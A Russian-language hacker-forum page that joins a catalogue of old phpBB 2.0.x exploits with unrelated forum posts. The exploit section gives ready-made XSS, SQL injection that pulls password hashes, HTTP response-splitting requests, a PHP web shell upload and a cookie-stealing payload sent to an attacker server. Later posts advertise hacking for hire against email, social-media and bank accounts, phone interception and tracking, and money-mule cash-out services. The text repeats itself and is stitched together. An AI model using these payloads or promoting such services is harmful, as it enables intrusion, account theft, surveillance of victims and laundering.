Уязвимость обнаружена в phpBB в 'viewtopic.php'. Удаленный пользователь может выполнить XSS нападение. 
Уязвимость обнаруженав параметре 'postorder' в сценарии 'viewtopic.php'. Пример: 
 
%22%3E%3C%73%63%72%69%70%74%3E%61
%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6 F%6B%69%65%
--
 
2.0.6d version:
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'viewtopic.php' и 'viewforum.php'. Удаленный пользователь может выполнить XSS нападение. 
viewforum.php?f={FNUM}&topicdays={DNUM}{XSS}
viewforum.php?f=1&topicdays=99"><script>alert(docu ment.cookie)</script>&star t=30
viewtopic.php?t=10&postdays=99"><script>alert(docu ment.cookie)</script>&start=20
--
Межсайтовый скриптинг:
Уязвимость обнаружена в phpBB в 'profile.php'. Удаленный пользователь может выполнить XSS нападение. 
 
Пример/Эксплоит:
-------------exploit.htm--------------<form name='f' action="http://site/profile.php?mode=editprofile" method="post"><input name="avatarselect" value='" ><script>alert(document.cookie)</script>'><input type="submit" name="submitavatar" value="Select avatar"></form><script>window.onload=function(){document.all.submitavatar.click();}</script>---------------end-------------------
2.0.7a version:
--
Sql инъекция:
Удаленный авторизованный администратор может внедрить SQL команды. Удаленный пользователь может выполнить XSS нападение. 
Пример: 
admin_smilies.php?mode=edit&id=99 UNION SELECT 0,username,0,user_password FROM othersite_phpbb_users WHERE user_id=2
и еще: 
admin_smilies.php?mode=edit&id={SQL}
admin_ smilies.php?mode=delete&id={SQL}
admin_smilies.php?mode=edit&id={XSS}
admin_smilies.php?mode=delete&id={XSS}
admin_styles.php?mode=edit&style_id={SQL}
admin_styles.ph p?mode=delete&style_id={SQL}
admin_styles.php?mode=edit&style_id={XSS}
admin_styles.php?mode=delete&style_id={XSS}
Также сообщается, что множество сценариев не проверяют ID сессии. В результате удаленный пользователь может внедрить phpBB команды в тело сообщения, которые будут выполнены в браузере целевого пользователя, просматривающего сообщение форума.
--
 
2.0.8 version:
--
Sql инъекция:
Уязвимость в проверке правильности входных данных обнаружена в 'privmsg.php' сценарии. Удаленный пользователь может внедрить произвольный SQL код. 
 
Пример: 
pm_sql_user=AND%20pm.privmsgs_type=-99%20UNION%20SELECT%20username,null,
user_password,null,null,null,null,null,null,null,n ull,null,null,null,null,null,null,null
,null,null,null,null,null,null,null,null,null,null ,null,null,null FROM phpbb_users WHERE user_level=1 LIMIT 1/* 
/privmsg.php?folder=savebox&mode=read&p=99&pm_sql_u ser=AND pm.privmsgs_type=-99 UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,username,0 ,0,0,0,0,0,0,0,0,user_password FROM phpbb_users WHERE user_id=2 LIMIT 1/*
--
Раскрытие пути:
 
 
 
 
--
XSS:
in "index.php":
 
{cat_id}=1&category_rows{0}{cat_title}=waraxe<scri pt>alert(document.cookie);</script>&category_rows{0}{cat_order}=99
 
in "languagelang_englishlang_faq.php":
 
http://localhost/phpbb208/faq.php?faq{0}{0...document.cookie );</script>bar&faq{0}{1}=waraxe
 
in "languagelang_englishlang_bbcode.php ":
 
{0}=f00<script>alert(document.cookie);</script>bar&faq{0}{1}=waraxe
--
 
2.0.8а version:
--
Спуфинг IP адресов:
Удаленный пользователь может подделать свой IP адрес, который будет зарегистрирован приложением. 
 
Удаленный пользователь может сконструировать специально обработанный 'X-Forwarded-For' HTTP заголовок, чтобы подменить свой реальный IP адрес произвольным IP адресом. 
 
В результате удаленный пользователь может обойти ограничения доступа к приложению по IP адресу.
--
 
2.0.10 version:
--
Межcайтовый скриптинг и Response Splitting Attacks:
Уязвимость позволяет удаленному пользователю выполнить XSS нападение. 
 
1. Сценарий /phpBB2/search.php' не фильтрует HTML код в поле 'search_author'. Пример: 
 
search_author=%27%3Cscript%3Ealert(document.cookie )%3C/script%3E
 
Также сообщается, что phpBB уязвим к HTTP Response Splitting нападениям (как описано в 
http://www.sanctumin.....PResponse.pdf). Удаленный пользователь может отравить еш web прокси. Уязвимы сценарии '/phpBB2/privmsg.php' и '/phpBB2/login.php'. Пример запроса: 
 
POST /phpBB2/login.php HTTP/1.0
Host: SERVER
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
Content-Type: application/x-www-form-urlencoded
Content-length: 129
 
logout=foobar&redirect=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTT
P/1.0%20200%20OK%0d%0aContent-Length:%207%0d%0a%0d%0aGotcha!
 
Еще пример: 
GET /phpBB2/privmsg.php?mode=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200
%20OK%0d%0aContent-Length:%207%0d%0a %0d%0aGotcha!
HTTP/1.0
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.7 {en} (WinNT; I)
Host: SERVER
--
SQL-инъекция и php инклудинг:
Удаленный атакующий может выполнить произвольный SQL команды и php код на уязвимой системе. 
Уязвимость существует при обработке спецсимволов в строке URL. Удаленный атакующий может выполнить SQL-инъекцию и произвольный php-сценарий на уязвимой системе. Пример:
 
viewtopic.php?t=1&highlight=%2527
 
Exploit: [here!] (2.0.10.perl.txt)
Exploit: [here!] (2.0.10-2.perl.txt)
--
Межсайтовое выполнение сценариев:
Удаленный атакующий может получить доступ к важным данным пользователей.
Уязвимость существует из-за некорректной обработки входных данных переменной 'username'. Удаленный атакующий может создать сообщение, которое при просмотре выполнить произвольный HTML код в браузере жертвы.
--
 
2.0.11 version:
--
Просмотр и удаление произвольных файлов:
Уязвимость форуме позволяет удаленному пользователю раскрыть содержание и удалять (unlink) произвольные файлы на системе с привилегиями Web сервера. 
Уязвимость в phpBB в нескольких сценариях, отвечающих за обработку аватаров (usercp_avatar.php, usercp_viewprofile.php и usercp_register.php) позволяет удаленному пользователю контролировать параметры, переданные функции unlink().
--
 
2.0.12 version:
--
Удаленный административный доступ:
Уязвимость позволяет удаленному пользователю обойти некоторые ограничения безопасности и получить административные привилегии на форуме. 
Уязвимость связана с ошибков в сравнении "sessiondata{'autologinid'}" и "auto_login_key". В результате возможно получить административные привилегии на форуме. Логическая уязвимость обнаружена в сценарии includes/sessions.php в следующей строке: 
 
if( $sessiondata{'autologinid'} == $auto_login_key )
Условие выполняется, если длина $sessiondata{'autologinid'}, представленная в куки пользователя, равна длине переменной $auto_login_key. Для исправления уязвимости ее необходимо заменить на строку: 
 
if( $sessiondata{'autologinid'} === $auto_login_key )
Также сообщается об ошибке в "viewtopic.php", которая позволят раскрыть инсталляционный путь.
 
Exploit: [here!] (2.0.12.c.txt)
--
 
2.0.13 version:
--
XSS-атака в сценарии usercp_register.php:
Уязвимость позволяет удаленному пользователю произвести межсайтовый скриптинг и получить доступ к важным данным пользователей.
Уязвимость обнаружена в сценарии 'usercp_register.php' из-за недостаточной обработки входных данных в перемененных 'allowhtml', 'allowbbcode', и 'allowsmilies' в подписи пользователя. Злоумышленник может послать частное сообщение со специально обработанной подписью, чтобы выполнить произвольный HTML сценарий в браузере целевого пользователя.
--
Раскрытие установочной директории:
Уязвимость позволяет злоумышленнику получить информацию об установочной директории приложения на сервере. 
 
Уязвимость существует в сценарии 'phpBB/db/oracle.php'. Удаленный пользователь может непосредственно вызвать уязвимый сценарий и получить информацию об установочной директории приложения на сервере.
--
Получение административных привилегий:
 
Exploit: [here!] (2.0.13-admin.c.txt)
--
Получение хеша паролей:
 
Exploit: [here!] (2.0.13.perl.txt)
--
Загрузка произвольных файлов:
Уязвимость позволяет удаленному пользователю загрузить произвольный файл на сервер.
Уязвимость существует в сценарии up.php из-за некорректной проверки расширений файлов. Удаленный авторизованный пользователь может загрузить произвольный php файл и выполнить его с привилегиями web сервера.
 
Пример Эксплоита:
<?system($cmd)?>
Сохраняем как cmd.php
Открываем http://target/phpbb/up.php
И загружаем наш код.
Его можно увидеть http://targey/phpbb/uploads/cmd.php
Запуская видим:
Warning: system(): Cannot execute a blank command in /home/target/public_html/forum/uploads/tetx.php on line 2
Следовательно мы можем выполнить NIX команды с привеленгиями веб сервера.
--
 
2.0.15 version:
--
Межсайтовый скриптинг в при обработке BBCODE URL:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.
Уязвимость обнаружена при обработке BBCODE URL в сценарии bbcode.php. Удаленный пользователь может с помощью специально сформированного сообщения выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
 
{url=javascript://%0ASh=alert(%22CouCou%22);window.close();}Alert box with "CouCou"{/url} 
{url=javascript://%0ASh=new%20ActiveXObject(%22WScript.shell%22);
Sh.regwrite(%22HKCU%5C%5CQQQQQ
%5C%5Cqq%22,%22CouCou%22);window.close();}Create registry entry: HKCUQQQQQqq = "CouCou"{/url}
 
{url=javascript://%0Awindow.opener.document.body.innerHTML
=window.opener.document.body.innerHTML.replace(%27 Hi%20Paul%27,%27Hi%20P.A.U.L%27);
window.close();}Modify opener page: Paul -> P.A.U.L{/url}
--
Регистрация множества юзеров. Отказ в обслуживание:
 
Exploit: [here!] (2.0.15-DOS.c.txt)
--
Выполнение произвольного PHP сценария в phpBB в коде highlighting: (update time:02.07.05)
Пример:
Позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за некорректного использования функции preg_replace() в сценарии 'viewtopic.php' при обработке входных данных. Удаленный пользователь может с помощью специально сформированного запроса заставить приложение интерпретировать входные данные как PHP сценарий и выполнить его. 
 
Exploit: [here!] (2.0.15.perl.txt)
 
2.0.19 version:
--
Раскрытие данных:
Уязвимость существует из-за того, что ID сессии включается в заголовок HTTP "Referer" при отправке запросов внешние аватары или при создании ссылок на внешние сайты. Злоумышленник может заставить администратора просмотреть профиль пользователя, содержащий внешний аватар, и получить ID сессии администратора. Для удачной эксплуатации уязвимости необходимо, чтобы использование внешних аватаров было разрешено на сайте (не является значением по умолчанию). 
Примеры:
 
http://[HOST]/[DIR]/admin/admin_users.php?sid=88eafcce6dddcee3fccc08de7ec505d0
http://[HOST]/[DIR]/modcp.php?t=2&mode=split&sid=c1db64124b7ced0668dec5900fed3b35
--
XSS:
В admin/admin_smilies.php вы можите изменять / создавать смайлы. Нечего особенного но phpBB не проверят что происходит в БД.
$smile_code = ( isset($HTTP_POST_VARS['smile_code']) ) ? $HTTP_POST_VARS['smile_code'] : $HTTP_GET_VARS['smile_code'];$smile_url = ( isset($HTTP_POST_VARS['smile_url']) ) ? $HTTP_POST_VARS['smile_url']: $HTTP_GET_VARS['smile_url'];$smile_url = phpbb_ltrim(basename($smile_url), "'");$smile_emotion = ( isset($HTTP_POST_VARS['smile_emotion']) ) ? $HTTP_POST_VARS['smile_emotion'] : $HTTP_GET_VARS['smile_emotion'];$smile_code = trim($smile_code);$smile_url = trim($smile_url);$smile_emotion = trim($smile_emotion); // If no code was entered complain ...if ($smile_code == '' || $smile_url == ''){message_die(GENERAL_MESSAGE, $lang['Fields_empty']);} //// Convert < and > to proper htmlentities for parsing.//$smile_code = str_replace('<', '<', $smile_code);$smile_code = str_replace('>', '>', $smile_code); //// Save the data to the smiley table.//$sql = "INSERT INTO " . SMILIES_TABLE . " (code, smile_url, emoticon)VALUES ('" . str_replace("'", "''", $smile_code) . "', '" . str_replace("'", "''", $smile_url) . "', '" . str_replace("'", "''", $smile_emotion) . "')";$result = $db->sql_query($sql);
Примеры:
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:x:&smile_url=icon_mrg
reen.gif&smile_emotion=c" onmouseover="alert('SecurityReason.Com')" &sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:h:&smile_url=icon_mrg
reen.gif"%20onmouseover='alert("SecurityReason.Com")'%20&sid=SIDofADMIN
 
http://[HOST]/[DIR]/admin/admin_smilies.php?mode=savenew&smile_code=:q:&smile_url=icon_mrg
reen.gif"%20onmouseover="alert(document.location='http://[SRVER]/cookies?'+document.co
okie)"%20&sid=SIDofADMIN
--
Узявимость в в генераторе случаных чисел:
При восстановление пароля пользователь вводит е-маил и имя пользователя.phpBB генерирует id подтверждения
/includes/usercp_sendpasswd.php line 51"$user_actkey = gen_rand_string(true);" and than generate a password.  /includes/usercp_sendpasswd.php line 55"$user_password = gen_rand_string(false);"
Id подтверждения отсылаеться на е-маил с сылкой по которой должен проследовать пользователь для подтверждения. Давайте посмотрим на gen_rand_string() функцию:
/profile.php line 61function gen_rand_string($hash){$chars = array( 'a', 'A', 'b', 'B', 'c', 'C', 'd', 'D', 'e', 'E', 'f', 'F', 'g', 'G', 'h', 'H', 'i', 'I', 'j', 'J', 'k', 'K', 'l', 'L', 'm', 'M', 'n', 'N', 'o', 'O', 'p', 'P', 'q', 'Q', 'r', 'R', 's', 'S', 't', 'T', 'u', 'U', 'v', 'V', 'w', 'W', 'x', 'X', 'y', 'Y', 'z', 'Z', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0'); $max_chars = count($chars) - 1;srand( (double) microtime()*1000000); $rand_str = '';for($i = 0; $i < 8; $i++){$rand_str = ( $i == 0 ) ? $chars[rand(0, $max_chars)] : $rand_str . $chars[rand(0, $max_chars)];} return ( $hash ) ? md5($rand_str) : $rand_str;
зная, что PRNG's действительно не случаен, и что данный те же самые, PRNG произведет те же самые случайные числа, мы можем безопасно предположить это из-за "srand( (double) microtime()*1000000); " то число всегда будет от 1 до 999,999. Также знание, что пароль сгенерирован прямо после получения id подтверждения, как только мы получаем id подтверждения, индексное микровремя, используемое, чтобы отобрать поколение пароля не будет слишком далеко, чем микровремя имело обыкновение отбирать id подтверждения. Самое плохое в этом сценарии атаки - то, что Вы должны будете послать 1мил запросов на сброс пароля , нападавший может однако снизить этот показатель к диапазону 100 КБ, если он с умеет синхронизировать, время посылки запросы со временим на сервере, А оно отображаетсья на каждой главной странице любого форума. 
 
[phpbb - нападение]
 
Я написал 3 программы, ту, которая создовала произвольные пароли и таблицы id подтверждений , ту, которая посылала GET запросы для активизации смены пароля и последнию, которая использовала список паролей, чтобы сделать нападение по словарю на учетную запись phpbb. Испытательный сайт, который я решил использовать, останется анонимным (я был забанен!) После производства id подтверждения и паролей, я решил пробовать сбросить мою собственную учетную запись. Я запросил изменение пароля к моей собственной учетной записи. Я немедленно запустил мою вторую программу, чтобы послать id's подтверждения, которые были усечены, чтобы иметь только 6 символов (длина используемую на сервере). 
 
После 40 минут программа пометила это, это сумело сбросить пароль, и это выводило id подтверждения, который активизировал изменение пароля. Я взял id подтверждения, открыл мою таблицу и узнал, что логин проверки правильности был в индексе 117312 (мне повезло , могло, были и больше). Я открыл таблицу паролей, удалил все перед индексом 117312 и все после индекса 120000,получилс список в 2688 пароля. Я запустил мою заключительную программу, используя список паролей. Я получил новый пароль в течение 10 секунд, это было в индексе 117490, что означает, что чтобы произвести id подтверждения надо примерно 178.



#418 форум-хакеров.рф В черном списке, обман пользователей

Написано Admin : 29 Май 2016 - 02:52

Доброго времени суток, приветствую вас снова на форуме хакеров.
xakertop.com
Пишу по теме, прошло два дня и администратор все-таки ответил нашей Natali777 на сайте форум-хакеров.рф
Наша страница Natali777 как вы помните, просила проверить наш новый почтовый ящик-'соответственно админ не знает что ящик наш' на то можно ли ему доверять, как я и ожидал, администратор добавил нашу тему в разделе 'проверка хакеров и сервисов в интернете' на их форуме.
Наш новый почтовый ящик, который не где не фигурирует,
(вообще нигде так как он совершенно новый) оказался по их мнению мошенником, которому верить нельзя)))

можете зайти посмотреть, вот ссылка:
http://форум-хакеров...go7gooyandexru/

Для тех кто не читал тему разоблачения их форума, не поймет.
Прошу тех, кто не читал описание этой темы, вначале прочесть описание и тогда Вам всё станет ясно.
Выкладываю ссылки и скрины, чтоб всё было максимально открыто.
Вообщем таким образом форум хакеров рф занял свое место в нашем разделе черного списка.
Заходите проверяйте сами, всё максимально открыто делаю, чтоб всем было видно, как они хитро вводят в заблуждение обыкновенных пользователей, дабы выставить свои услуги реально рабочими, а остальные услуги даже не проверяются ими и автоматически объявляются мошенниками))), повторюсь (просто выставить визуально свои услуги рабочими!!) их услуги также настроены на обман пользователей, как и их форум, будьте бдительны!!!
Спасибо за внимание, я надеюсь вам была полезна наша статья.
Профессиональные хакеры и опытные программисты, не важно форум это или просто человек который предлагает свои услуги взлома или хакера, никогда не будет без проверки называть того или иного мошенником, тем самым вводя пользователя в заблуждение, дабы обратились только к ним за помощью, будьте бдительны помощи вы от них не дождетесь, вас обманут будьте бдительны!!!

Кстати на почту [email protected] так и не поступило не каких писем с просьбой помочь хотя-бы, они ведь должны были от чего то отталкиваться, прежде чем называть новый совершенно (повторюсь) Новый ящик, который был создан 2 дня назад, как и регистрация Natali777, на их форуме и создана тема с просьбой проверки нашего же (ящика шпиона)))

Вывод http://форум-хакеров.рф ресурс мошенников

Спасибо за внимание.
Форум хакеров xakertop.net

Прикрепленные изображения

  • image.jpg



#324 Услуги хакера, взлом, тайная слежка.

Написано X-Room : 03 Май 2016 - 10:08

Опытный хакер имею за спиной огромный опыт и массу проделанных проектов, известен в сети. Выхожу на новый уровень набора клиентов, после закрываю тему и ухожу в приватную работу. Пока мои услуги хакера открыты и ими может воспользоваться каждый. Оказываю услуги взлома любой сложности, берусь за любые проекты, не вижу препятствий

[email protected]

Мои услуги и возможности более детально:




1. Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.

2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com , live.com , mail.com , aol.com , hotmail.com , и пр.
- mail.ru , yandex.ru , bk.ru , rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта... Сделайте Взлом на заказ или заказ на взлом любой почты.

3. Получение удаленного доступа к пк
- Mac, Win, Unix и пр.
- Получу удаленный доступ к любому пк, выкачаю файлы, удалю файлы, заблокирую доступ и любые даже экстравагантые просьбы.

4. Удалю все, что мешает в интернете, очищу любые ресурсы : блоги, форума, каналы ютуб, новостные ресурсы и даже БАЗЫ ДАННЫХ любых учереждений.
- Очистим любую информацию, что есть в сети, готовы почистить поисковые системы, чтобы не выдавали информацию по нужному запросу. Можете обращаться к нам сделаем в лучшем виде.

5. Взлом Iphone и любых приложений.
- Взлом viber, whatsapp, и любых других приложений.
- Вариант получения удаленного доступа к телефону и выкачке/удалению любой информации/слежения за жертвой.

6. Любые операции с Мобильными операторами.
- Распечатка смс, прослушка звонков.
- Определение местонахождения абонента в реальном времени.
- Защита от перехвата смс, защита от прослушки.

7. Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей, повторяю работаем с зарубежными.


8. Работаем по взлому форекс, финансовых направлениях, тендерных площадках.
- Взлом любых тендерных площадок, есть готовые решения.
- Взлом в Forex направлениях, работаем с MT4, MT5
- Взлом банковских аккаунтов и счетов
Любой другой взлом и направления, их масса, выслушаем Ваши запросы.

9. Взлом Skype и любой другой телефонии.

10. Взлом серверов любых типов.

Полная анонимность, почта защищена от посторонних глаз!


[email protected]


И это далеко не весь перечень работ которые может выполнить настоящий хакер. В настоящее время рынок услуги хакера не является переполненным, а напротив спрос доминирует над предложением. Так же нужно учитывать, что редко можно найти настоящего исполнителя, а не шарлатана,
Чтобы не попасть на таких мошенников, советуем Вам тщательно провести анализ рынка и понять одну простую истину, что если дешево - не всегда хорошо но и не факт что плохо. Посудите логически, если в среднем адекватная цена по взлому почты от 10 000 рублей это за рубежом, то предложения по 2, 3, и 5 тысяч будут стоить в России.
Когда Вы решили заказать взлом сайта, то советуем не спешить. Прежде всего сами проанализируйте и представьте, какую сумму за работу Вы готовы выложить, считайте по максимуму. В среднем взлом простого сайта, повторяю сайта а не страницы, Вам обойдется от 40 долларов и выше. Не стоит верить, что хакер сделает все за копейки и за час срок выполнения такого заказа от двух часов как минимум и до суток. Сразу хотим сообщить Вам примерные сроки, т.к многие клиенты пишут :"Один человек обещал мне сделать взлом на заказ за один час, да и сказал, что этот сайт легко взломать."
Мы закроем глаза, что это был сложный корпоративный сайт ирландской компании, которая тратит миллионы евро в год на обеспечение безопасности. Сложно после такого донести клиенту, что тот человек был мошенником и далек от нашего ремесла.Ситуации случаются разные, поэтому мы и советуем Вам обращаться только к профи. В связи с состоянием рынка у нас достаточно много клиентуры, жаловаться не приходится, что опять же подтверждает наш профессионализм. Услуги хакера мы предоставляем длительное время и за этот
длительный срок мы произвели много собственных наработок и алгоритмов, что помогает нам осваивать новейшие уязвимости. Заказать взлом именно у нас - лучшее Ваше решение и Вы о нем не будете сожалеть, про наши преимущества нет смысла лишний раз напоминать, Вы это почувствуете самостоятельно. Просим Вам быть еще предельно бдительными, т.к в последнее время под видом хакерских услуг зачастую стоят силовые ведомства и вместо получения Вашего заказа, Вы получаете проблемы с законом, в лучшем случае огромная взятка или официальный штраф.
Стоит внимательно изучить человека к которому Вы обращаетесь, обратить внимание на его орфографию и манеру общения, как может человек предоставлять услуги хакера если он сам не является грамотным? Обратите внимание на методы оплаты, которые Вам предлагает хакер, если он делает предложение оплаты на мобильный телефон, а еще хуже на банковскую карту - знайте в лучшем случае это неопытный мошенник, который скоро попадет в руки милиции. В худшем случае - "наши защитники".
Мы никогда не интересуемся зачем и для чего Вы делаете заказ, мы выполняем свою работу хладнокровно. Но всегда готовы предоставить несколько дружелюбных советов, например как конфиденциально пользоваться взломанным сайтом или почтой. Такие консультации мы всегда проводим бесплатно, без разницы, является ли человек нашим клиентом или нет. Всегда рады предоставить вам лучший взлом на заказ. Когда вы сомневаетесь в чей-то порядочности, можете воспользоваться услугами безопасной сделки (гаранта), либо отказаться, ведь иной раз лучше не знать всей правды, она может оказаться горькой.

Словом все услуги не пропишешь, готов взять любой заказ с любой фантазией клиента, пишите на почту - рад общениюОпытный хакер имею за спиной огромный опыт и массу проделанных проектов, известен в сети. Выхожу на новый уровень набора клиентов, после закрываю тему и ухожу в приватную работу. Пока мои услуги хакера открыты и ими может воспользоваться каждый. Оказываю услуги взлома любой сложности, берусь за любые проекты, не вижу препятствий

[email protected]


Мои услуги и возможности более детально:




1. Взлом сайтов и web проектов любой сложности и тематики
- Форумы
- Бизнес сайты
- Сайты визитки
- Коропоративные сайты
И любые другие сайты.

2. Взлом почты, взлом корпоративной почты, взлом зарубежной почты.
- yahoo.com , live.com , mail.com , aol.com , hotmail.com , и пр.
- mail.ru , yandex.ru , bk.ru , rambler.ru и пр.
- Любая коропоративная или экзотическая почта будет вскрыта... Сделайте Взлом на заказ или заказ на взлом любой почты.

3. Получение удаленного доступа к пк
- Mac, Win, Unix и пр.
- Получу удаленный доступ к любому пк, выкачаю файлы, удалю файлы, заблокирую доступ и любые даже экстравагантые просьбы.

4. Удалю все, что мешает в интернете, очищу любые ресурсы : блоги, форума, каналы ютуб, новостные ресурсы и даже БАЗЫ ДАННЫХ любых учереждений.
- Очистим любую информацию, что есть в сети, готовы почистить поисковые системы, чтобы не выдавали информацию по нужному запросу. Можете обращаться к нам сделаем в лучшем виде.

5. Взлом Iphone и любых приложений.
- Взлом viber, whatsapp, и любых других приложений.
- Вариант получения удаленного доступа к телефону и выкачке/удалению любой информации/слежения за жертвой.

6. Любые операции с Мобильными операторами.
- Распечатка смс, прослушка звонков.
- Определение местонахождения абонента в реальном времени.
- Защита от перехвата смс, защита от прослушки.

7. Взлом социальных сетей, работаем с зарубежными сетями.
- взлом вконтакте, взлом vk
- взлом facebook
- взлом ok, взлом одноклассники
- взлом мамба
- взлом loveplanet
И любых других социальных сетей, повторяю работаем с зарубежными.


8. Работаем по взлому форекс, финансовых направлениях, тендерных площадках.
- Взлом любых тендерных площадок, есть готовые решения.
- Взлом в Forex направлениях, работаем с MT4, MT5
- Взлом банковских аккаунтов и счетов
Любой другой взлом и направления, их масса, выслушаем Ваши запросы.

9. Взлом Skype и любой другой телефонии.

10. Взлом серверов любых типов.

Полная анонимность, почта защищена от посторонних глаз!

[email protected]


И это далеко не весь перечень работ которые может выполнить настоящий хакер. В настоящее время рынок услуги хакера не является переполненным, а напротив спрос доминирует над предложением. Так же нужно учитывать, что редко можно найти настоящего исполнителя, а не шарлатана,
Чтобы не попасть на таких мошенников, советуем Вам тщательно провести анализ рынка и понять одну простую истину, что если дешево - не всегда хорошо но и не факт что плохо. Посудите логически, если в среднем адекватная цена по взлому почты от 10 000 рублей это за рубежом, то предложения по 2, 3, и 5 тысяч будут стоить в России.
Когда Вы решили заказать взлом сайта, то советуем не спешить. Прежде всего сами проанализируйте и представьте, какую сумму за работу Вы готовы выложить, считайте по максимуму. В среднем взлом простого сайта, повторяю сайта а не страницы, Вам обойдется от 40 долларов и выше. Не стоит верить, что хакер сделает все за копейки и за час срок выполнения такого заказа от двух часов как минимум и до суток. Сразу хотим сообщить Вам примерные сроки, т.к многие клиенты пишут :"Один человек обещал мне сделать взлом на заказ за один час, да и сказал, что этот сайт легко взломать."
Мы закроем глаза, что это был сложный корпоративный сайт ирландской компании, которая тратит миллионы евро в год на обеспечение безопасности. Сложно после такого донести клиенту, что тот человек был мошенником и далек от нашего ремесла.Ситуации случаются разные, поэтому мы и советуем Вам обращаться только к профи. В связи с состоянием рынка у нас достаточно много клиентуры, жаловаться не приходится, что опять же подтверждает наш профессионализм. Услуги хакера мы предоставляем длительное время и за этот
длительный срок мы произвели много собственных наработок и алгоритмов, что помогает нам осваивать новейшие уязвимости. Заказать взлом именно у нас - лучшее Ваше решение и Вы о нем не будете сожалеть, про наши преимущества нет смысла лишний раз напоминать, Вы это почувствуете самостоятельно. Просим Вам быть еще предельно бдительными, т.к в последнее время под видом хакерских услуг зачастую стоят силовые ведомства и вместо получения Вашего заказа, Вы получаете проблемы с законом, в лучшем случае огромная взятка или официальный штраф.
Стоит внимательно изучить человека к которому Вы обращаетесь, обратить внимание на его орфографию и манеру общения, как может человек предоставлять услуги хакера если он сам не является грамотным? Обратите внимание на методы оплаты, которые Вам предлагает хакер, если он делает предложение оплаты на мобильный телефон, а еще хуже на банковскую карту - знайте в лучшем случае это неопытный мошенник, который скоро попадет в руки милиции. В худшем случае - "наши защитники".
Мы никогда не интересуемся зачем и для чего Вы делаете заказ, мы выполняем свою работу хладнокровно. Но всегда готовы предоставить несколько дружелюбных советов, например как конфиденциально пользоваться взломанным сайтом или почтой. Такие консультации мы всегда проводим бесплатно, без разницы, является ли человек нашим клиентом или нет. Всегда рады предоставить вам лучший взлом на заказ. Когда вы сомневаетесь в чей-то порядочности, можете воспользоваться услугами безопасной сделки (гаранта), либо отказаться, ведь иной раз лучше не знать всей правды, она может оказаться горькой.

Словом все услуги не пропишешь, готов взять любой заказ с любой фантазией клиента, пишите на почту - рад общению.
Контакты: [email protected]

Прикрепленные изображения

  • image-2.jpg



#27879 Бесплатный чекер аккаунтов ВКонтакте

Написано Edwardemeno : 15 Октябрь 2020 - 07:14

https://vk.progs.su/
Бесплатный чекер аккаунтов ВКонтакте,
для быстрой проверки аккаунтов ВКонтакте на валидность,
полной информации об анкете страницы ВК.

Гибкая система управления и сортировки аккаунтов по анкете,
выборка по критериям.
Доступна проверка на:
статус, актив, голоса, управление групп, друзья, подписчики, подарки, id страницы, страна, город, пол, возраст, семейное положение, аватарка, фамилия имя, количество записей.
Разгадывание капчи сервисом Rucaptcha.com (ключ капчи).
И другие функции в новых версия.

Сайт https://vk.progs.su/


#27775 краткий отзыв xakerservice

Написано SealMaster : 25 Сентябрь 2020 - 01:55

Никаких особенных заказов у этого хакера я не делал. Стандартный взлом, обычной странички, ничего такого. Ну собственно работа выполнена, выполнена в целом неплохо.. Результат меня устроил, поэтому этого взломщика я могу посоветовать другим людям. Его почта - [email protected] Моя оценочка 5/5.. Ничего лишнего, удачной работы вам!


#27425 Заработок в интернете

Написано b1Squ1t : 09 Январь 2019 - 05:47

Как легко, получается создают фишинговый сайт (или как оно там) и просто ломают аккаунты? 

 

Да, этот называется фишинг. Согласно википедии:

 

Фишинг — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям. Это достигается путём проведения массовых рассылок электронных писем от имени популярных брендов, а также личных сообщений внутри различных сервисов, например, от имени банков или внутри социальных сетей. В письме часто содержится прямая ссылка на сайт, внешне неотличимый от настоящего, либо на сайт с редиректом. После того как пользователь попадает на поддельную страницу, мошенники пытаются различными психологическими приёмами побудить пользователя ввести на поддельной странице свои логин и пароль, которые он использует для доступа к определённому сайту, что позволяет мошенникам получить доступ к аккаунтами и банковским счетам.




#26251 Дропы под любые цели.

Написано Admin : 01 Июль 2018 - 10:19

Дорогие пользователи и гости форума хакеров, появилась услуга безопасного вывода средств, Если вам нужно вывести черные деньги, Либо получить на почте товар и прочее, то вы можете обратиться к нам по данному вопросу.

Мы предлагаем получить средства под определенный процент.
Плюсы в том что вы не рискуете не чем, всю работу дроп берет на себя, забирает процент от суммы и остальные деньги переводит на любой счет который скажете, лимита по сумме нет.
Возможны переводы Western Union, мигом и прочие переводы, Вы можете не беспокоится за ваши деньги и проблемы с выводом.
По вопросам заключения сделки, обращайтесь в личные сообщения или Телеграм
@XpRo_bot




#25309 Качество работы доставит вам удовольствие!

Написано byvaliy : 22 Март 2018 - 05:00

-------------------------------------[email protected]-------------------------------------

                          Вы получите от нашего сервиса следующие услуги взлома на заказ:
 
- Быстрое выполнение заказа
- Качество работы доставит вам удовольствие
- Гарантируем конфиденциальность каждому клиенту


vk и ok
  Что вы получите от нашего сервиса, заказывая взлом вконтакте или одноклассники:
- Пароль и логин для входа без изменения (в единственном случае можем изменить, если об этом просит клиент)
- Повторный взлом бесплатно, если жертва поменяет пароль в течении месяца
- Доказательства - на ваш выбор
- Анонимность и качественное выполнение заказа
